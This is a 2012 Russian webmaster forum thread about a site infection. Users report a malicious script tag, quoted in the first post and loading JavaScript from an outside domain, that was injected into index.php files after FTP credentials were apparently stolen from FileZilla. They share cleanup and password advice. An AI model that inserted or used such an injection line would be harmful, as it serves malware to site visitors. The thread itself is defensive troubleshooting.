Вирус на сайте
Страницы: 1 2 След.
Вирус на сайте
Здравствуйте. Думаю, данную тему нужно прочитать всем, может кто-то найдёт у себя тоже подобную неприятность.И так.
Вчера Я.Вебмастер определил, что один мой сайт безопасен: появился красный значок.
Сегодня полез разбираться и обнаружил в исходном коде (который выдаёт браузер) вот такую строчку:

Код
 <script src="http://bdnbah.info/style.js"></script><script src="http://bdnbah.info/style.js"></script>


И эта строчка шла сразу же после <html>Начал смотреть другие сайты этого же хостинга (мои сайты), тоже обнаруживал эту строчку. Иногда она стояла в боди, а иногда вместо был iframe.
Проанализировав всё, пришёл к выводу, что злоумышленник получил доступ по ftp (скорее всего программа).
Ну что ж, я начал шерстить все файлы. Большинство было - движки Вордпресс. Один сайт я просмотрел полностью. Файлы определял по дате изменения. Все index были изменены 10 марта.
Вредоносная строчка дописывалась всегда в файл index.php. Удалил всё, и будут мониторить дальше. Странный джаваскрипт с сайтов пропал.
Тех, кто зайдёт в данную тему, прошу проверить парочку своих сайтов (просто html главной  страницы - это займёт у вас 5 секунд)
*Пароли естественно семенил.
Вот теперь думаю, где подхватил эту дрянь. Пару дней сидел без антивиря, быть может тогда...
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
Была такая же проблема. Имхо, вирус\троян украл данные от FTP из FileZilla - там они не сильно шифруются насколько я в курсе.
Цитата
Дмитрий Иванов пишет:
украл данные от FTP из FileZilla
Я так тоже подумал, ибо у меня как раз этот клиент.Я его снёс нафиг, скачал свежую версию, и сейчас буду устанавливать... Хотя теперь стоит подумать. Может, какой другой клиент установить. Вы тем же самым пользуетесь?


Цитата
Дмитрий Иванов пишет:
Была такая же проблема.
Вы её устранили и... Больше подобная весчь не появлялась?
Сегодня устранил - вычистил вредоносный код из index.php и сменил все пароли - пока полет нормальный, отправил сайты на перепроверку в яндексе - он уже успел пометить парочку как потенциально опасные.

Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов, и на обоих прописался этот вирус. На остальных хостингах никаких проблем.

FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.
Я тоже подыскиваю фтп-клиент бесплатный. На файлзиллу возваращаться желания нет однозначно smile:(

Цитата
Дмитрий Иванов пишет:
FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.

Это дополнение к мозилле или есть полноценная программа? Там соединение шифруется по умолчанию? То есть доп. настроек делать не нужно?
Дополнение. При каждом запуске спрашивает мастер пароль которым и шифруются данные от FTP. Дополнительных настроек не нужно.
Цитата
Дмитрий Иванов пишет:
Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов
Ставьте "с запросом" и не будет проблем, имейте привычку менять пароли каждую неделю
Хостинг Beget на СУПРе
Здравствуйте, мой сайт joy-game.ru/ и его отправили в АГС за эту фигню. Как её убрать? FileZill(ой) не пользовался, в начале данного скрипта нету. Помогите пожалуйста. Кстати, хочу подчеркнуть, если ввести этот код в гугл или яндекс, то на форумах, просят о помощи после 10 марта 2012 года(Что и странно). И как можно убрать?
Цитата
grant1425 пишет:
просят о помощи после 10 марта 2012 года
Да кстати. Наплыв какой-то по вирусам. Нехорошая тенденция.
grant1425, Не стал открывать сайт.... что за ПП стоят на сайте? шаб откуда? сприпты с левых доменов ставили?
Роман, сайт не изменял 4 недели или даже больше. Не чего не было и вдруг где-то числа 11 вирусняк появился
grant1425, Вирусняк на ucoze smile:confused: это только вы сами могли натворить
Изменено: Роман - 13 Марта 2012 20:49
Роман, по твоему появился скрипт и все полезли его брать? И вирусы появились...
grant1425, Я хочу сказать, это полностью ваша вина, что подхватили какую то х. Смените шаблон, убейте Гротаторы
Спасибо за тему. Долго думал где он находится. Сразу что то не догадался глянуть в index
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
02:17 Как продвигать сайт с неуникальным контентом 
15:08 Стоит ли добавлять сайт в Rambler топ 100? 
12:59 Absence в Армении 
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
01:31 Скрипт обменника валют 
21:59 Продам копию сайта. 
21:44 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
17:24 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
14:01 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
13:15 SOCKS5 приватные прокси на 30 дней для PayPal 
13:14 Google Voice аккаунты для бесплатных SMS и звонков 
22:09 Добро пожаловать в цифровой мир... 
21:28 Ну что, кто куда деваете свои сайты? 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди